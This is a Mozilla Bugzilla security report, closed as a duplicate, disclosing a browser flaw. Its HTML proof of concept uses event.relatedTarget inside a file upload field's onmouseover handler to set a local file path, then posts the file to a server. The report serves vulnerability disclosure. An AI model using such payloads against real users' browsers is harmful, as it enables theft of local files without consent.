Closed Bug 164687 Opened 23 years ago Closed 23 years ago

Uploading arbitrary files using event.relatedTarget

Categories

(Core :: DOM: Core & HTML, defect)

Product:
Core
Component:
DOM: Core & HTML
Platform:
x86
Windows 2000
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
VERIFIED DUPLICATE of bug 164023

People

(Reporter: security-bugs, Assigned: alexsavulov)

Details

It is possible to steal local files with the file upload control. This is somewhat related to bug 163598 but the trick is done with event.related target. The following reads a local file and sends it to remote server. ----------------------------------- <html> Written by <a href="http://www.guninski.com">Georgi Guninski</a> <br> <form action="http://localhost/cgi-bin/x.pl" enctype="multipart/form-data" method="POST"> Mouse over this: <input type=file name=c onmouseover='event.relatedTarget.value="/var/www/html/index.html"'><br> <input type=submit> </form> </html> ----------------------------------- Due to the increased number of file upload attacks, I suggest adding a warning whenever a file is being uploaded. Georgi Guninski
*** This bug has been marked as a duplicate of 164023 ***
Status: NEW → RESOLVED
Closed: 23 years ago
Resolution: --- → DUPLICATE
Trusting John on this, verifying
Status: RESOLVED → VERIFIED
Group: security
Component: HTML: Form Submission → DOM: Core & HTML
You need to log in before you can comment on or make changes to this bug.